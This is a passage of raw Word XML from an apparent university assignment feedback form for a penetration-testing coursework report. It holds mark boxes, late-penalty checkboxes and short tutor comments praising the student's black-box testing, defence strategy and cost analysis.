            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="430AEC6D"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80" w:name="totalSPP"/>
            <w:bookmarkEnd w:id="80"/>
            <w:r w:rsidRPr="00556C3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51CD6D6"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bookmarkStart w:id="81" w:name="markSPP"/>
            <w:bookmarkEnd w:id="81"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="564E4C6B" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="264757E1" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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A032D08"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E33AAA"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r>
    </w:tbl>
    <w:p w14:paraId="14D69BB6" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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6C31" w:rsidRPr="00556C31" w14:paraId="37528F16" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:shd w:val="pct15" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08204BBE" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Assignment Mark </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:bCs/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C3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A067B75"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b/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Late Submission Penalties (tick if appropriate)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="45BB23A0" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="82" w:name="totalMark"/>
            <w:bookmarkEnd w:id="82"/>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>96%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="6BAE5F86" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="75481049" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="68A5C3CB"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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Up to four weeks late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3A552594" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="83" w:name="fourWeeksLate"/>
            <w:bookmarkEnd w:id="83"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="6F8F68A4" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:leftChars="71" w:left="156"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="7104060D" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1B9392F0" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0778D363"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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>First Attempt?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="41523A68" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="84" w:name="firstAttempt"/>
            <w:bookmarkEnd w:id="84"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="0A977F87" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLineChars="141" w:firstLine="282"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="426920C6" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D4FAF3" w14:textId="77777777" w:rsidR="00556C31" w:rsidRDefault="00556C31">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2E74B5" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:sectPr w:rsidR="00556C31" w:rsidSect="00556C31">
          <w:footerReference w:type="default" r:id="rId41"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="567" w:right="720" w:bottom="567" w:left="720" w:header="709" w:footer="709" w:gutter="0"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AAC35BD" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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6C31" w:rsidRPr="00556C31" w14:paraId="41BA9E4A" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10670" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BFBFBF"/>
          </w:tcPr>
          <w:p w14:paraId="2B9657FF" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:br w:type="page"/>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:caps/>
                <w:sz w:val="40"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">                 marking criteria and Student FEEDBACK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2F574FC1" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="439B74E8" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00556C31">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">This section details the assessment criteria. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00556C31">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extent</w:t>
      </w:r>
      <w:r w:rsidRPr="00556C3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DE0C14C" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C3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56C31" w:rsidRPr="00556C31" w14:paraId="453863AA" w14:textId="77777777" w:rsidTr="00556C3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264525A" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">Common Assessment Criteria </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">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DB84D6B" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="34"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7ECC1F" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113"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 xml:space="preserve">Marks </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0569C1B1" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:ind w:left="113" w:right="113"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="14"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>awarded</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="79356324"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1F544BB9"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1. E</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>ngagement with Literature Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FE9BF4F"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55D485D"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ADEBA2"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12E7A782" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="10294C40" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">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1B5EE395"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24D84AD"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r>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="58C929EC" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5C11E4B7"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802D0D"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4D2D22"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5DE082E8"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385A21E5" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">2. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Knowledge and Understanding Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D31BE4"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1E1E187"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95E0DE"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64B18085" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="090AEB75" w14:textId="77777777" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>You have demonstrated excellent knowledge of the practical work for the penetration testing and explained the methods and tools for conducting the black boxes testing on the live site thoroughly.  (Grade mark: 95.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02F78D92"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DFED801"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="14A23DA4" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="089C5D4A"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B393BB"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376173"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41D94B8D"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2F236D48"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3. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Cognitive and Intellectual Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D243F8A"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2A68FE9"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EBC45E"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253DFE48" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="450"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48342E5F" w14:textId="6ADEB498" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
            <w:pPr>
              <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t xml:space="preserve">You have discussed: The configuration changes that could be made to the site and defence strategy.  You have done a cost analysis of the solutions and Gantt chart timetable for the execution of solutions.  You have done an analysis of the findings as well as reflection of the Black Box </w:t>
            </w:r>
            <w:r w:rsidR="00B70A2A">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="14"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>entest.  (Grade mark: 95.00%)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="pct"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="14E3DDAA"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4BB6C7F"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19</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00556C31" w:rsidRPr="00556C31" w14:paraId="3E9680CA" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5650E832"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E8B069"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C49BB7"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36B4CD8E"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2ED79FE6"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4. </w:t>
            </w:r>
            <w:r w:rsidRPr="00556C31">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>Practical Application Skills</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="211DFE38"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AE5EA6"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71B18A"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6F131373" w14:textId="77777777" w:rsidTr="00556C31">
        <w:trPr>
          <w:trHeight w:val="451"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4435" w:type="pct"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="513E92EE" w14:textId="638B80D4" w:rsidR="00556C31" w:rsidRPr="00556C31" w:rsidRDefault="00556C31" w:rsidP="00556C31">
